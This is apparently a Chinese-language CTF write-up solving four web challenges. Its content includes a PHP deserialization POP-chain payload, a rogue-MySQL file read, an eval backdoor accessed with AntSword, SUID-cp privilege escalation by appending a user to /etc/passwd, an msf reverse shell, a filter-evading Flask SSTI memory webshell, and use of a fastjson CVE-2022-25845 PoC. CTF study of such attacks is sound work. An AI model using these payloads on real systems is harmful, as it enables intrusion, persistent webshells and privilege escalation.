web
ezpop
反序列化、浅拷贝
<?php
error_reporting(0);
class DayDay{
public $secret;
public $password;
public $filename;
public function __call($arg1,$arg2) {
$this->execute();
}
private function execute(){
$this->secret=md5(mt_rand());
if($this->password===$this->secret){
echo file_get_contents($this->filename);
}else{
echo "Hacker !!!";
}
}
}
class five {
protected $hahah;
public function __get($arg){
$this->hahah->$arg="Nero";
return $this->hahah->$arg;
}
public function __toString(){
return $this->NoNO;
}
public function __construct($obj) {
$this->hahah=$obj;
}
}
class FFFF {
public $four;
public function __invoke(){
$this->four->sihasia();
}
}
class Music{
public $Tech;
public $a='';
public function __set($name,$info) {
$Alkaline=$this->a;
return $Alkaline();
}
}
class Hello{
public $hello;
public function __construct() {
$this->hello="Six G0d";
}
public function _SayGo() {
echo "Do you like".$this->hello."?";
}
function __destruct() {
$this->_SayGo();
}
}
function filter($string) {
$filter='/flag/i';
return preg_replace($filter,"",$string);
}
$poc=$_GET['poc'];
if(isset($poc)){
show_source(__FILE__);
unserialize(filter($poc));
}else{
show_source(__FILE__);
}
|
payload:
O%3A5%3A%22Hello%22%3A1%3A%7Bs%3A5%3A%22hello%22%3BO%3A4%3A%22five%22%3A1%3A%7Bs%3A5%3A%22hahah%22%3BO%3A5%3A%22Music%22%3A2%3A%7Bs%3A4%3A%22Tech%22%3BN%3Bs%3A1%3A%22a%22%3BO%3A4%3A%22FFFF%22%3A1%3A%7Bs%3A4%3A%22four%22%3BO%3A6%3A%22DayDay%22%3A3%3A%7Bs%3A6%3A%22secret%22%3BN%3Bs%3A8%3A%22password%22%3BR%3A7%3Bs%3A8%3A%22filename%22%3Bs%3A5%3A%22%2Fflflagag%22%3B%7D%7D%7D%7D%7D
O:5:"Hello":1:{s:5:"hello";O:4:"five":1:{s:5:"hahah";O:5:"Music":2:{s:4:"Tech";N;s:1:"a";O:4:"FFFF":1:{s:4:"four";O:6:"DayDay":3:{s:6:"secret";N;s:8:"password";R:7;s:8:"filename";s:5:"/flflagag";}}}}}
|
mysecret
<?php
highlight_file(__FILE__);
class DB{
public $host;
public $username;
public $password;
public $dbname;
public function __construct($host, $username, $password, $dbname){
$this->host = $host;
$this->username = $username;
$this->password = $password;
$this->dbname = $dbname;
}
public function __wakeup()
{
echo $this->link();
}
public function link(){
$conn = new mysqli(
$this->host,
$this->username,
$this->password
);
if(!$conn->connect_error){
$conn->select_db($this->dbname);
$conn->query("SET NAMES utf8");
mysqli_close($conn);
return "Success";
}else{
return "Fail";
}
}
}
@unserialize($_GET['data']);
if(isset($_GET['pass']) && sha1($_GET['pass']) === "2e59e260ed970274a5b077635a81c88c3ce9356c"){
eval($_POST['backdoor']);
}
?>
|
公网ip服务器上运行那个py, 反序列化那里就正常填ip, root, 密码和数据库名为空; 把py文件里面的/etc/passwd改成/hint就行
反序列化
<?php
class DB{
public $host;
public $username;
public $password;
public $dbname;
public function __construct($host, $username, $password, $dbname){
$this->host = $host;
$this->username = $username;
$this->password = $password;
$this->dbname = $dbname;
}
public function __wakeup()
{
echo $this->link();
}
public function link(){
$conn = new mysqli(
$this->host,
$this->username,
$this->password
);
if(!$conn->connect_error){
$conn->select_db($this->dbname);
$conn->query("SET NAMES utf8");
mysqli_close($conn);
return "Success";
}else{
return "Fail";
}
}
}
$a = new DB('ip','root','','');
echo serialize($a);
|
hint里面是密码:
rs297ns9s2930003nn29ss55789ss0sn
|
蚁剑连接:
# URL地址:
http://e1c3e1fc72887e91.node.nsctf.cn/?pass=rs297ns9s2930003nn29ss55789ss0sn
# 密码:
backdoor
|
cp有SUID权限, 将/etc/passwd复制下来, 在最后添加新的用户
msf生成php反弹木马, 弹出来即可连接, 然后su切换新的用户, 即可读取flag
Memory
python flask 内存马
给的waf.py文件:
import random
blacklist=[
'_', 'class', 'base', 'mro', 'subclasses', '.', '[', ']', '{%', "'", '"',
'request', 'cookie', 'values', 'url_for', 'config', 'builtins', 'globals',
'init', '\\x', 'attr', 'getitem', 'string', 'list', 'select', 'pop', 'print',
'set', '{{', 'join', 'count','app','os',"import","modules","dict","sys"
]
def waf(s):
evilcode= random.sample(blacklist,10)
if not s.isascii():
return False
else:
for key in evilcode:
if key in s:
return True
return False
|
网站的/hint文件
if method=="POST":
template = request.form.get("code")
if waf(template):
return "Hacker Found"
result = render_template_string(template)
|
原始内存马:
url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})
|
变形payload:
request.application
request.application.__self__._get_data_for_json.__getattribute__('__globa'+'ls__').__getitem__('__bui'+'ltins__').__getitem__('ex'+'ec')("app.add_url_rule('/h3rmesk1t', 'h3rmesk1t', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('shell', 'calc')).read())",{'_request_ct'+'x_stack':get_flashed_messages.__getattribute__('__globa'+'ls__').pop('_request_'+'ctx_stack'),'app':get_flashed_messages.__getattribute__('__globa'+'ls__').pop('curre'+'nt_app')})
|
json
CVE-2022-25845
直接改poc.java文件
static String target = "http://7dcef4ada4bd5d44.node.nsctf.cn/json";
static String file = "file:///flag";
|
跑poc即可
